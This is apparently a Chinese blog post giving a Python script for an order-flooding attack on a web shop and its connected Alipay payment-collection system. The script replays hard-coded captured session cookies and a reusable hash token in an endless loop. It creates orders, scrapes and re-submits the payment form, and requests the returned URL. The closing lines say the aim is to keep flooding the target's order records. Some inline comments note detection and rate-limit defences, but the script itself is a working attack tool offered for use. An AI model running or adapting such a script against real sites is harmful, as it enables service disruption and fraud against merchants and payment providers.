
python刷单攻击简单实现

admin 10月前 125

# -*- coding: utf-8 -*-

import requests
import time
import json
import re
from threading import Thread, Lock, enumerate
from logger import logger
from urllib import parse
from lxml import etree
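# Compatibility shim: the cookie-jar module has a different name in Python 2
# and Python 3.
# NOTE(review): this file uses f-strings (Python 3.6+ syntax), so the Python 2
# branch cannot actually run; it is kept only to preserve the original intent.
try:
    # Python 2 module name
    import cookielib
except ImportError:
    # Python 3 module name. Only ImportError is caught so that unrelated
    # failures (KeyboardInterrupt, a broken logger, ...) are not swallowed.
    import http.cookiejar as cookielib
    logger.info("user cookielib in python3.")
else:
    logger.info("user cookielib in python2.")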

# Browser User-Agent string. The visible code never reads this name; each
# header dict below hard-codes its own User-Agent value.
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"

# Lock created at import time; nothing in the visible script acquires it.
mutex = Lock()

# One shared HTTP session for every request the script makes.
miSession = requests.Session()
# The session's default cookie jar cannot be saved to disk, so it is swapped
# for an LWPCookieJar bound to a file; the main block later calls load() on it.
miSession.cookies = cookielib.LWPCookieJar(filename="toodroyCookies.txt")


# Headers for the order-creation POST (ajax.php?act=pay) issued in the main
# loop. They imitate a browser XHR; the target host is masked as "*.*" on
# this page.
# NOTE(review): the Cookie value is a literal session string (PHPSESSID,
# mysid, sec_defend, counter) published in plain text -- it looks like it was
# copied from a captured browser request; confirm.
# NOTE(review): "Content-Length" is pinned to "70" instead of being derived
# from the body actually sent -- presumably also copied from a capture.
# Detection note: all four header sets are static (same User-Agent, same
# literal Cookie strings, a never-changing "counter" value), so repeated
# requests are byte-for-byte alike -- a usable server-side signal for
# spotting this kind of automation.
header1 = {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Content-Length": "70",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=ef9c820cca525ce48ace7fd7b1b8b9895861f347dad1451c4de2507b4ffef015; counter=16",
    "Host": "*.*",
    "Origin": "http://*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http:///*.*cid=133&tid=3602",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
}

# Headers for the GET of other/submit.php (the page carrying the hidden
# payment-form fields). Same PHPSESSID/mysid as header1, with a different
# sec_defend value and counter=17.
header2 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=71e15b606271ee8f54f84735836857be10e326cffc326927c7bea09092be0a69; counter=17",
    "Host": "*.*",
    "Origin": "http://",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/?cid=133&tid=3602",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}

# Headers for the POST to submit.php that re-submits the scraped form fields.
# The Cookie string is identical to header2's.
header3 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=71e15b606271ee8f54f84735836857be10e326cffc326927c7bea09092be0a69; counter=17",
    "Host": "*.*",
    "Origin": "http://*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}

# Headers for the final GET of the URL taken from the submit.php response.
# This Cookie string has a different PHPSESSID and different cookie names
# than header1-3 -- presumably a session on a second site (the payment
# gateway); confirm.
header4 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "X_CACHE_KEY=f1015f53e5f555f042f0dc54217a505b; UM_distinctid=17b11655d513b1-0cef74f3873bf-2343360-10ae00-17b11655d52726; CNZZDATA1279952036=2036474364-1628084460-%7C1628084460; player_album=0; player_song=0; ocinkCurrTime=0; PHPSESSID=tgetb2934ic7js1534g6d72nms",
    "Host": "*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/submit.php",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}


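def loads_jsonp(_jsonp):
    """Extract and decode the JSON object embedded in a JSONP-style string.

    The text from the first ``{`` to the last ``}`` is passed to
    ``json.loads``; whatever surrounds it (callback name, parentheses,
    whitespace) is ignored.

    Args:
        _jsonp: Response text expected to contain one JSON object.

    Returns:
        The decoded JSON value.

    Raises:
        ValueError: If no ``{...}`` span is found, the span is not valid
            JSON, or ``_jsonp`` is not a string.
    """
    try:
        # re.S lets "." match newlines, so multi-line payloads still match.
        return json.loads(re.match(r".*?({.*}).*", _jsonp, re.S).group(1))
    except (AttributeError, TypeError, ValueError) as err:
        # AttributeError: re.match returned None (no braces in the input).
        # TypeError: the input was not a string.
        # ValueError: covers json.JSONDecodeError.
        # A bare "except:" here would also trap KeyboardInterrupt/SystemExit.
        raise ValueError('Invalid Input') from err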

if __name__ == "__main__":
    # Entry point: an endless loop that replays a four-request checkout
    # sequence (create order -> fetch payment form -> submit form -> request
    # the returned URL) against a host masked as "*.*" on this page. The
    # visible code never completes a payment; per the page's own description
    # the aim is to pile up order records on the shop and on the payment
    # system behind it.
    #
    # Defender note: the loop depends on order creation being unthrottled and
    # on the request token being reusable. Per-session/per-IP rate limits on
    # order creation, a cap on unpaid orders, short expiry of pending orders
    # and a challenge (e.g. CAPTCHA) before checkout each interrupt it.

    # Step 1: try to reuse an existing login by loading saved cookies.
    miSession.cookies.load(ignore_discard=True, ignore_expires=True)

    # Fixed order parameters, sent unchanged on every iteration.
    # NOTE(review): the same "hashsalt" value is replayed each time; if the
    # server keeps accepting it, the token is not single-use -- confirm.
    postData1 = {
        "tid": '3602',
        "inputvalue": 'a',
        "num": '10',
        "hashsalt": 'b34e1503749832482a3b356cc3db97e9',
    }
    while True:
        # Create an order.
        resp1 = miSession.post(
            "http://*.*/ajax.php?act=pay",data=postData1,
            headers=header1)
        logger.info(f"resp1.status_code = {resp1.status_code}")
        logger.info(f"resp1.text = {resp1.text}")
        # The response is parsed as JSON wrapped in JSONP-style text.
        resp1Json = loads_jsonp(resp1.text)
        logger.info(f"resp1Json = {resp1Json}")

        # Raises KeyError (unhandled) if the response carries no trade_no.
        trade_no= resp1Json['trade_no']
        logger.info(f"trade_no = {trade_no}")

        # Generate the payment form: fetch the page that holds the hidden
        # form fields. trade_no is concatenated into the URL as received.
        resp2 = miSession.get(
            "http://*.*/other/submit.php?type=alipay&orderid="+trade_no,
            headers=header2, allow_redirects=False)
        logger.info(f"resp2.status_code = {resp2.status_code}")
        #logger.info(f"resp2.text = {resp2.text}")
        # Scrape each <input> value by name. .pop() takes the last match and
        # raises IndexError (unhandled) when a field is absent.
        dom = etree.HTML(resp2.text)
        money = dom.xpath('//input[@name="money"]//@value').pop()
        logger.info(f"dom.money = {money}")
        name = dom.xpath('//input[@name="name"]//@value').pop()
        logger.info(f"dom.name = {name}")
        notify_url = dom.xpath('//input[@name="notify_url"]//@value').pop()
        logger.info(f"dom.notify_url = {notify_url}")
        out_trade_no = dom.xpath('//input[@name="out_trade_no"]//@value').pop()
        logger.info(f"dom.out_trade_no = {out_trade_no}")
        pid = dom.xpath('//input[@name="pid"]//@value').pop()
        logger.info(f"dom.pid = {pid}")
        return_url = dom.xpath('//input[@name="return_url"]//@value').pop()
        logger.info(f"dom.return_url = {return_url}")
        sitename = dom.xpath('//input[@name="sitename"]//@value').pop()
        logger.info(f"dom.sitename = {sitename}")
        # NOTE(review): this local name shadows the builtin type().
        type = dom.xpath('//input[@name="type"]//@value').pop()
        logger.info(f"dom.type = {type}")
        sign = dom.xpath('//input[@name="sign"]//@value').pop()
        logger.info(f"dom.sign = {sign}")

        # Re-submit the scraped fields unchanged, including the server-issued
        # "sign"; sign_type is sent as the literal 'MD5'.
        postData2 = {
            "money": money,
            "name": name,
            "notify_url": notify_url,
            "out_trade_no": out_trade_no,
            "pid":pid,
            "return_url": return_url,
            "sitename": sitename,
            "type":type,
            "sign":sign,
            "sign_type": 'MD5',
        }

        resp3 = miSession.post(
            "http://*.*/submit.php", data=postData2,
            headers=header3)
        logger.info(f"resp3.status_code = {resp3.status_code}")
        #logger.info(f"resp3.text = {resp3.text}")
        dom2 = etree.HTML(resp3.text)
        flag = dom2.xpath('//script//text()')
        # No <script> text in the response: log the body text, wait 240 s and
        # start over. Presumably this is the server refusing or throttling
        # the request -- confirm.
        if(len(flag)==0):
            notice = dom2.xpath('//body//text()')
            logger.info(f"resp3.notice = {notice}")
            time.sleep(240)
            continue
        # Take the first single-quoted string from the last script text node;
        # presumably a JavaScript redirect target -- confirm.
        url = dom2.xpath('//script//text()').pop().split("'")[1]
        logger.info(f"resp3.url = {url}")

        # Request that URL without following redirects; only the status code
        # is logged. The loop then repeats immediately, with no delay.
        resp4 = miSession.get(
            f"http://*.*/"+url,
            headers=header4, allow_redirects=False)
        logger.info(f"resp4.status_code = {resp4.status_code}")
        #logger.info(f"resp4.text = {resp4.text}")

 没有多余的废话,简单而实用。

目标是不停地刷对方的订单数据,以及与之对接的代收付系统。
